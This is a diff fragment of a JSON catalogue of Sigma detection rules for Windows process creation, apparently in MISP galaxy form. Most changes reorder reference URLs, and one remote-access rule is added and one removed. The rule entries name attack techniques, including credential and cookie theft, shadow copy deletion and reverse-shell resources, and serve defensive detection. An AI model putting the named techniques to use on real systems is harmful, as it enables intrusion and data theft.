"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -48824,8 +48925,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc.yml" ], "tags": [ @@ -48934,39 +49035,6 @@ "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "value": "HackTool - CrackMapExec Process Patterns" }, - { - "description": "Detects the execution of a system command via the ScreenConnect RMM service.", - "meta": { - "author": "Ali Alwashali", - "creation_date": "2023/10/10", - "falsepositive": [ - "Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used." - ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/pull/4467", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ] - }, - "related": [ - { - "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "b1f73849-6329-4069-bc8f-78a604bb8b23", - "value": "Remote Access Tool - ScreenConnect Remote Command Execution" - }, { "description": "Detects the execution of \"gpg.exe\" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.", "meta": { @@ -48978,9 +49046,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md", "https://securelist.com/locked-out/68960/", + "https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_portable_execution.yml" ], "tags": [ @@ -49013,9 +49081,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/", "https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py", "https://blog.viettelcybersecurity.com/saml-show-stopper/", - "https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml" ], "tags": [ @@ -49049,8 +49117,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.dfirnotes.net/portproxy_detection/", "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml" ], @@ -49086,8 +49154,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/", "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", + "https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml" ], "tags": [ @@ -49308,8 +49376,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222095371175911424", - "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml" ], "tags": [ @@ -49342,8 +49410,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/orange_8361/status/1518970259868626944", "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://twitter.com/orange_8361/status/1518970259868626944", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml" ], "tags": [ @@ -49367,8 +49435,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" ], "tags": [ @@ -49401,8 +49469,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57", "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", + "https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" ], "tags": [ @@ -49512,10 +49580,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", "https://github.com/defaultnamehere/cookie_crimes/", - "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", + "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", + "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml" ], "tags": [ @@ -49690,9 +49758,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode.yml" ], "tags": [ @@ -49783,8 +49851,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml" ], "tags": [ @@ -49818,9 +49886,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://www.poweradmin.com/paexec/", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml" ], "tags": [ @@ -49853,8 +49921,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://pentestlab.blog/2017/03/30/weak-service-permissions/", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" ], "tags": [ @@ -50066,8 +50134,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/3proxy/3proxy", "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/3proxy/3proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml" ], "tags": [ @@ -50101,8 +50169,8 @@ "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", - "https://twitter.com/ReaQta/status/1222548288731217921", "https://www.activecyber.us/activelabs/windows-uac-bypass", + "https://twitter.com/ReaQta/status/1222548288731217921", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" ], @@ -50137,9 +50205,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.python.org/3/using/cmdline.html#cmdoption-c", - "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", + "https://docs.python.org/3/using/cmdline.html#cmdoption-c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml" ], "tags": [ @@ -50369,6 +50437,39 @@ "uuid": "903076ff-f442-475a-b667-4f246bcc203b", "value": "Nltest.EXE Execution" }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2024/02/23", + "falsepositive": [ + "Legitimate usage of the tool" + ], + "filename": "proc_creation_win_remote_access_tools_simple_help.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_simple_help.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "95e60a2b-4705-444b-b7da-ba0ea81a3ee2", + "value": "Remote Access Tool - Simple Help Execution" + }, { "description": "Shadow Copies deletion using operating systems utilities", "meta": { @@ -50383,15 +50484,15 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/Raccine#the-process", - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://blog.talosintelligence.com/2017/05/wannacry.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", - "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/Neo23x0/Raccine#the-process", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", + "https://blog.talosintelligence.com/2017/05/wannacry.html", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml" ], "tags": [ @@ -50468,9 +50569,9 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Ssh/", - "https://github.com/LOLBAS-Project/LOLBAS/pull/211/files", "https://gtfobins.github.io/gtfobins/ssh/", "https://man.openbsd.org/ssh_config#LocalCommand", + "https://github.com/LOLBAS-Project/LOLBAS/pull/211/files", "https://man.openbsd.org/ssh_config#ProxyCommand", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml" ], @@ -50646,9 +50747,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" ], "tags": [ @@ -50672,9 +50773,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" ], "tags": [ @@ -50717,10 +50818,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", "https://twitter.com/Max_Mal_/status/1633863678909874176", "https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465", "https://twitter.com/_JohnHammond/status/1588155401752788994", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml" ], "tags": [ @@ -50852,13 +50953,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", + "https://twitter.com/CyberRaiju/status/1251492025678983169", "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", "https://www.cobaltstrike.com/help-opsec", - "https://twitter.com/CyberRaiju/status/1251492025678983169", "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" ], "tags": [ @@ -50892,11 +50993,11 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/_JohnHammond/status/1708910264261980634", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", "https://twitter.com/egre55/status/1087685529016193025", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml" ], "tags": [ @@ -51130,8 +51231,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.localpotato.com/localpotato_html/LocalPotato.html", "https://github.com/decoder-it/LocalPotato", + "https://www.localpotato.com/localpotato_html/LocalPotato.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml" ], "tags": [ @@ -51156,8 +51257,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/", "https://github.com/sensepost/impersonate", + "https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml" ], "tags": [ @@ -51259,8 +51360,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml" ], "tags": [ @@ -51293,8 +51394,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" ], "tags": [ @@ -51327,9 +51428,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Winget/", "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", - "https://lolbas-project.github.io/lolbas/Binaries/Winget/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml" ], "tags": [ @@ -51396,9 +51497,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" ], "tags": [ @@ -51465,8 +51566,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", "https://twitter.com/x86matthew/status/1505476263464607744?s=12", + "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" ], "tags": [ @@ -51500,8 +51601,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" ], @@ -51558,8 +51659,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/cglyer/status/1183756892952248325", "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", + "https://twitter.com/cglyer/status/1183756892952248325", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml" ], "tags": [ @@ -51625,9 +51726,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/", "https://twitter.com/_st0pp3r_/status/1583914515996897281", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" ], "tags": [ @@ -51854,8 +51955,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", - "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/samratashok/ADModule", + "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml" ], "tags": [ @@ -51914,10 +52015,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/0gtweet/status/1583356502340870144", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", "https://lolbas-project.github.io/lolbas/Binaries/Setres/", - "https://twitter.com/0gtweet/status/1583356502340870144", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml" ], "tags": [ @@ -51958,10 +52059,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", - "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", + "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml" ], "tags": [ @@ -52351,9 +52452,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://www.poweradmin.com/paexec/", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" ], "tags": [ @@ -52386,8 +52487,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", "https://twitter.com/Moriarty_Meng/status/984380793383370752", + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml" ], "tags": [ @@ -52421,8 +52522,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/defaultpack.exe", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/", + "https://www.echotrail.io/insights/search/defaultpack.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml" ], "tags": [ @@ -52456,10 +52557,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", + "https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html", "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine", - "https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html", + "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml" ], "tags": [ @@ -52663,10 +52764,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", "https://twitter.com/ForensicITGuy/status/1334734244120309760", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml" ], "tags": [ @@ -52717,9 +52818,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", - "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml" ], "tags": [ @@ -52806,29 +52907,6 @@ "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", "value": "Suspicious Diantz Alternate Data Stream Execution" }, - { - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2022/01/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", - "value": "Rundll32 JS RunHTMLApplication Pattern" - }, { "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", "meta": { @@ -52842,9 +52920,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml" ], "tags": [ @@ -53044,8 +53122,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", 